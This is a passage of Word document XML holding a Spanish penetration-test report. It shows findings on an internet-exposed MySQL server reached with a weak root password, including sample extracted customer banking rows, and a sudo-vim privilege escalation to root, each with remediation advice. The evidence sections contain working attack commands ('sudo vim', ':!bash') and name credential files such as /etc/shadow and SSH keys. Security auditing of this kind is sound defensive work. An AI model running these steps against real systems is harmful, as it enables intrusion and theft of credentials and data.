          <w:p w14:paraId="7E29BE85" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>conexión directa desde cualquier ubicación.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="227EE742" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677"/>
          <w:p w14:paraId="797A9B07" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="002967CF" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002967CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F9A4364" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D1677">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ nmap -p 3306 192.168.1.50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C184A3E" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D1677">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PORT     STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE4EA31" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D1677">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3306/tcp open  mysql</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF92015" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2250AE02" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D1677">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ mysql -h 192.168.1.50 -u root -p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C30372E" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>[Conexión exitosa con password débil: "root123"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30C198E2" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677"/>
          <w:p w14:paraId="0E12E049" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="0030499C" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0030499C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0532FD41" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>- Conexión directa a la base de datos desde Internet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="102A6AF3" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>- Exposición de 150,000 registros de clientes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4655B8EE" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>- Datos sensibles accesibles:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A45554" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t xml:space="preserve">  * Números de cuenta bancaria</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786A73AB" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t xml:space="preserve">  * Saldos y movimientos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E46680" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t xml:space="preserve">  * Información personal (nombres, direcciones, RUT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="233D0E40" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t xml:space="preserve">  * Contraseñas hasheadas con MD5 (algoritmo débil)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7858673E" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677"/>
          <w:p w14:paraId="727DA5FD" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>Datos extraídos (ejemplo):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5955CD79" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>+----+------------------+-------------+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB890D2" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>| ID | Nombre           | Cuenta      | Saldo    |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0298976B" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>+----+------------------+-------------+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F59028" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>| 1  | Juan Pérez       | 12345678-9  | $125,000 |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11A80F6D" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>| 2  | María López      | 98765432-1  | $89,450  |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77647840" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>+----+------------------+-------------+----------+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64661D2B" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677"/>
          <w:p w14:paraId="3C79E672" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="0030499C" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0030499C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Recomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B8A6581" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t xml:space="preserve">1. URGENTE: Configurar firewall para bloquear puerto 3306 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7764C147" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t xml:space="preserve">   desde Internet (permitir solo red interna)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F57C291" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>2. Cambiar contraseña de root inmediatamente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D02598" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>3. Crear usuario específico con privilegios limitados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103F07DF" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>4. Implementar autenticación por certificados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D1DACB5" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>5. Migrar hashes MD5 a bcrypt o Argon2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56778C85" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:r w:rsidRPr="003D1677">
              <w:t>6. Activar logs de auditoría de MySQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4356B251" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677"/>
          <w:p w14:paraId="7003ABC2" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="00FF1ECC" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Configuración recomendada (firewall):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E1259D" w14:textId="77777777" w:rsidR="003D1677" w:rsidRPr="003D1677" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D1677">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>iptables -A INPUT -p tcp --dport 3306 -s 192.168.1.0/24 -j ACCEPT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A56019E" w14:textId="77777777" w:rsidR="0018367A" w:rsidRDefault="003D1677" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D1677">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>iptables -A INPUT -p tcp --dport 3306 -j DROP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="100D39CD" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E6731EF" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03B275E1" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52B17BE0" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1850096A" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19B2AA41" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31598FF1" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FDB4B58" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="003D1677">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52FC7446" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A058F33" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02537557" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>🚨</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #3:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF1ECC">
              <w:t xml:space="preserve"> Escalada de privilegios vía sudo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C94DF7" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03C0E1E4" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="003A379C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Usuario afectado:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF1ECC">
              <w:t xml:space="preserve"> jperez</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A69430" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="003A379C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVSS:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF1ECC">
              <w:t xml:space="preserve"> 8.8 (CRÍTICO)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268FBD4C" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC"/>
          <w:p w14:paraId="735DC780" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="003A379C" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A379C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Descripción:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FBB70DC" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t xml:space="preserve">El usuario "jperez" puede ejecutar vim con privilegios </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04E58F67" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t xml:space="preserve">de root sin contraseña, permitiendo escalada trivial </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75BB100C" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>a máximo privilegio del sistema.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24638DF4" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC"/>
          <w:p w14:paraId="1A498B35" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="003A379C" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A379C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126E2143" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ sudo -l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25FEB2E0" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>User jperez may run the following commands:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3721034F" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    (root) NOPASSWD: /usr/bin/vim</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0888AF91" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7EC3F42F" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ sudo vim</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7BBD37" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:!bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C16B07D" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>root@servidor:~# whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D7D6627" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1ECC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EC4CF97" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F5CC392" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="003A379C" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A379C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C7B192" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>- Compromiso total del servidor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF41FDC" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>- Acceso a todos los archivos del sistema</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F76EB07" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>- Capacidad de instalar backdoors persistentes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0023368D" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>- Modificación de logs para ocultar actividad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F06BE1" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>- Acceso a credenciales de otros servicios en:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F677A78" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t xml:space="preserve">  /etc/shadow (contraseñas de usuarios)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD22CC1" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t xml:space="preserve">  /root/.ssh/id_rsa (llaves SSH)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D0BB5D0" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t xml:space="preserve">  /var/www/config.php (credenciales BD)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254AD444" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="003A379C" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42BDF72A" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="003A379C" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A379C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Recomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CBFE485" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>1. Remover entrada NOPASSWD para vim en /etc/sudoers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38AE8920" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>2. Aplicar principio de mínimo privilegio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ACF5D0E" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>3. Si vim es necesario, requerir contraseña sudo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2031A00E" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
              <w:t>4. Auditar configuración sudo de todos los usuarios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD5F4E1" w14:textId="77777777" w:rsidR="00FF1ECC" w:rsidRPr="00FF1ECC" w:rsidRDefault="00FF1ECC" w:rsidP="00FF1ECC">
            <w:r w:rsidRPr="00FF1ECC">
